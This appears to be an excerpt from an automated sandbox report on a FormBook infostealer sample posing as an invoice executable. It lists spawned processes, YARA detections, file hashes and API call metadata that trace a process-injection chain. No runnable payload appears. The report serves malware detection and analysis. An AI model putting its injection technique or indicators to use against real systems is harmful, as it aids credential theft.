                                                                                                                            Data Ascii: G0Yxd2Q=C83CGTle2oPsxwV5LpQSFZgRR1zy54RhtRUWKuUitsngu7W2HoXcGB8jeizE7fiNOD9u10dfUbohr36mTCLVjCbFLnMBCFytzT1HzIRyNjh04yHbUM6wzYJYHk+EwmYeajeZ3D258BORUwYDfqKpRIond9KMZ/xaUd76jlfld2uJ7C3onw==



                                                                                                                            Target ID:0
                                                                                                                            Start time:09:27:04
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            Imagebase:0xb60000
                                                                                                                            File size:965'632 bytes
                                                                                                                            MD5 hash:EEA9BF4A16AB377328A59BDE0A0C76DF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:3
                                                                                                                            Start time:09:27:05
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Imagebase:0x70000
                                                                                                                            File size:45'984 bytes
                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:09:27:05
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:45'984 bytes
                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:09:27:09
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe"
                                                                                                                            Imagebase:0xcb0000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:12
                                                                                                                            Start time:09:27:10
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:113'152 bytes
                                                                                                                            MD5 hash:8324ECE6961ADBE6120CCE9E0BC05F76
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:14
                                                                                                                            Start time:09:27:22
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe"
                                                                                                                            Imagebase:0xcb0000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:16
                                                                                                                            Start time:09:27:35
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                            Imagebase:0x7ff613480000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true


                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:11.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:241
                                                                                                                              Total number of Limit Nodes:21

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: :$:$E$O$P$S$t
                                                                                                                              • API String ID: 0-3177760418
                                                                                                                              • Opcode ID: 73a7a137229deff3b7d619533c09723f5a0874e6174381c128a55fb3920aa0da
                                                                                                                              • Instruction ID: 20bdc4badfc7f4377e9aa78c7a43f78fb4a72ce5b09c3c9e7a833bb202024369
                                                                                                                              • Opcode Fuzzy Hash: 73a7a137229deff3b7d619533c09723f5a0874e6174381c128a55fb3920aa0da
                                                                                                                              • Instruction Fuzzy Hash: 87322770A10A04CFDB15EB75C8587DEB7B2AFCA305F1045AED00AAB360DB75A989CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: :$:$E$O$P$S$t
                                                                                                                              • API String ID: 0-3177760418
                                                                                                                              • Opcode ID: e9fd79874dcfeb97321ae1ae44792b26407d1bd719d846fd91dc8ad3c2239741
                                                                                                                              • Instruction ID: 952a3db6476678408b1732dd871b88a86a6b1909f25718e4956bf90753bbfe44
                                                                                                                              • Opcode Fuzzy Hash: e9fd79874dcfeb97321ae1ae44792b26407d1bd719d846fd91dc8ad3c2239741
                                                                                                                              • Instruction Fuzzy Hash: 63322770A10A04CFDB15EF75C85879DB7B2AFCA305F1045AED00AAB360DB75A989CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 9c548c1360f537248f014f52477a0561fef5a0001be5867e6fe242d4f76f9796
                                                                                                                              • Instruction ID: 155c90c7bce162c12552d89b05cadddef709e52fa6bea3ea827307bb2294442c
                                                                                                                              • Opcode Fuzzy Hash: 9c548c1360f537248f014f52477a0561fef5a0001be5867e6fe242d4f76f9796
                                                                                                                              • Instruction Fuzzy Hash: 8A51ED71F001158FCB18CB69D8806AEB7B2FBC9315B64C57AE519D7758DB30EC418B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d3c7484a94ad216f67aeb9fd8d3f8e5b025a2c993874d142f88304f45e603899
                                                                                                                              • Instruction ID: 72d580745cb8289d15ce599863e919d52ddb99ae186e0fa971b0a63a28b0a86e
                                                                                                                              • Opcode Fuzzy Hash: d3c7484a94ad216f67aeb9fd8d3f8e5b025a2c993874d142f88304f45e603899
                                                                                                                              • Instruction Fuzzy Hash: 73729DB4E502298FCB14CF69D884AADBBF2FF88305F15C66AE405EB355D730A945CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 158592a744480b62171fb24de14ccf406717350e3bad01edadfd3fc92d42b6f6
                                                                                                                              • Instruction ID: ae16b088106ea9f5510a08ef5b7ca85492716a1516c13f99ed578d3b03a34f29
                                                                                                                              • Opcode Fuzzy Hash: 158592a744480b62171fb24de14ccf406717350e3bad01edadfd3fc92d42b6f6
                                                                                                                              • Instruction Fuzzy Hash: 8B816C32B505249FDB14DB69C880B5EB7A3AFC9710F1AC1A5E419EB366DE74EC018B80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 71719681a663b9b8580e73acf3062f2e835831c3d7508668a0fc0356629b1eb7
                                                                                                                              • Instruction ID: e66a175421112b89784682ab852f8536c9e05e9603d386647ef13e8ad684d238
                                                                                                                              • Opcode Fuzzy Hash: 71719681a663b9b8580e73acf3062f2e835831c3d7508668a0fc0356629b1eb7
                                                                                                                              • Instruction Fuzzy Hash: BD711AB8D5010EDFDF14CFAAD484AADBBB1BF88314F10A655D412EB254DB319941CF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0024e498834659658a0f28c7a30b08e86ecca9a6d2a2870d166f5ac7c39d195a
                                                                                                                              • Instruction ID: b2709308d3345ed2872cb8e364669f53a326b80e6a26602b268b3ed4a3d4b386
                                                                                                                              • Opcode Fuzzy Hash: 0024e498834659658a0f28c7a30b08e86ecca9a6d2a2870d166f5ac7c39d195a
                                                                                                                              • Instruction Fuzzy Hash: BD613C32F505248FD754DB69C880B5EB7A3AFC8710F1AC165E419EB36ADE74EC018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072B3016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 963392458-104565202
                                                                                                                              • Opcode ID: f4b4f6666f41038c75a01caba62ccd5fd6d98a14ad11175ab96075d1f3cdaf3b
                                                                                                                              • Instruction ID: ca31c7b49631229aa9caf20c3fa9a3fb3ac6c1623a36d5b5818ccd8c74fa7fa2
                                                                                                                              • Opcode Fuzzy Hash: f4b4f6666f41038c75a01caba62ccd5fd6d98a14ad11175ab96075d1f3cdaf3b
                                                                                                                              • Instruction Fuzzy Hash: 1D9147B1D1075ADFEB24CFA8C840BEDBAB2FF49310F148569E808A7240DB749985CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072B3016
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 963392458-104565202
                                                                                                                              • Opcode ID: c983de32d482566625e1deddd22863a0b31e1a103b474813359480258a801595
                                                                                                                              • Instruction ID: fa6a3071c1c7351a412fcb7d0335ddfef62eb9f48f3d84a86d121b4fb8165752
                                                                                                                              • Opcode Fuzzy Hash: c983de32d482566625e1deddd22863a0b31e1a103b474813359480258a801595
                                                                                                                              • Instruction Fuzzy Hash: 079138B1D1075ADFEB24CFA9C840BEDBAF2FF48310F148569E808A6240DB749985CF91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054E3F22
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 716092398-104565202
                                                                                                                              • Opcode ID: 3673eb97ab8c830db17bd0086adfcf14fd6055558d56d56dc33985caeafc6313
                                                                                                                              • Instruction ID: 30b9dcdf7b69a57ea32429fafaaa90780c16ae97d1cbd9e44af7af361c348b66
                                                                                                                              • Opcode Fuzzy Hash: 3673eb97ab8c830db17bd0086adfcf14fd6055558d56d56dc33985caeafc6313
                                                                                                                              • Instruction Fuzzy Hash: AD51C2B1D00349DFDB15CF99D884ADEBBB6FF48310F64852AE819AB214D774A845CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 054E3F22
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1265525054.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_54e0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID: 7KD;$7KD;
                                                                                                                              • API String ID: 716092398-104565202
                                                                                                                              • Opcode ID: 04de7351681545bb59272c6db7982c9db8f26b1e03f0ac4624076d310a9ebfc3
                                                                                                                              • Instruction ID: c2cbb892ceae7424fe5594bf4b0f5528a216aa63f1edcdf5f351604b08487c32
                                                                                                                              • Opcode Fuzzy Hash: 04de7351681545bb59272c6db7982c9db8f26b1e03f0ac4624076d310a9ebfc3
                                                                                                                              • Instruction Fuzzy Hash: 0751A0B1D003499FDB15CF9AD884ADEBBB6BF48310F64852AE819AB214D771A845CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072B2B06
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4275171209-359210496
                                                                                                                              • Opcode ID: 02a344e45ed4f8ed4be8e215265a053a25f2b3a2742564cd156536b1302af37a
                                                                                                                              • Instruction ID: 10ec1af2c7596105cf125c2ed3b7404cf99d645f16d5c9588e3103bbd3eff8c6
                                                                                                                              • Opcode Fuzzy Hash: 02a344e45ed4f8ed4be8e215265a053a25f2b3a2742564cd156536b1302af37a
                                                                                                                              • Instruction Fuzzy Hash: 4891E0B0A106259FDB25CB29C8906AEFBF6FF89350F24C619D42597269C770EC41CBD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9D59E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 4139908857-359210496
                                                                                                                              • Opcode ID: b62d388abde0c48799a26ec8b7728e563fb331cde832adc969ff091772b9a2eb
                                                                                                                              • Instruction ID: 1467a69d02ed1940c8cf2bb795258035699d04149cb8ccb58f6a4f93a56a330c
                                                                                                                              • Opcode Fuzzy Hash: b62d388abde0c48799a26ec8b7728e563fb331cde832adc969ff091772b9a2eb
                                                                                                                              • Instruction Fuzzy Hash: 6F813670A00B158FDB28EF29D44479ABBF1FF89308F109A2AD48AD7B50D774E945CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E959A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2289755597-359210496
                                                                                                                              • Opcode ID: a151e5c333aaf54f05ef9a1523460b811e9810e996c5a0997f0a29c8094badae
                                                                                                                              • Instruction ID: 44a941546d063850e734fbf3b925eef03c4a74385f3cdb1c0ee616b359db2e8e
                                                                                                                              • Opcode Fuzzy Hash: a151e5c333aaf54f05ef9a1523460b811e9810e996c5a0997f0a29c8094badae
                                                                                                                              • Instruction Fuzzy Hash: 4641CFB0C00719CBEB24DFA9C884BDDBBB5BF49304F60806AD409AB255DBB16945CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              [Control-flow graph; legend: Executed, Not Executed]
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E959A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2289755597-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              [Control-flow graph; legend: Executed, Not Executed]
                                                                                                                              APIs
                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,072B53A1,?,?), ref: 072B5548
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 2591292051-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              [Control-flow graph; legend: Executed, Not Executed]
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072B2BE8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3559483778-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              [Control-flow graph; legend: Executed, Not Executed]
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072B2BE8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1267091808.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_72b0000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3559483778-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9FBF6,?,?,?,?,?), ref: 02E9FCB7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3793708945-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9FBF6,?,?,?,?,?), ref: 02E9FCB7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1262831946.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_2e90000_Invoice_&_SOA_ready_for_dispatch.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID: 7KD;
                                                                                                                              • API String ID: 3793708945-359210496
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072B27DE
                                                                                                                              Strings
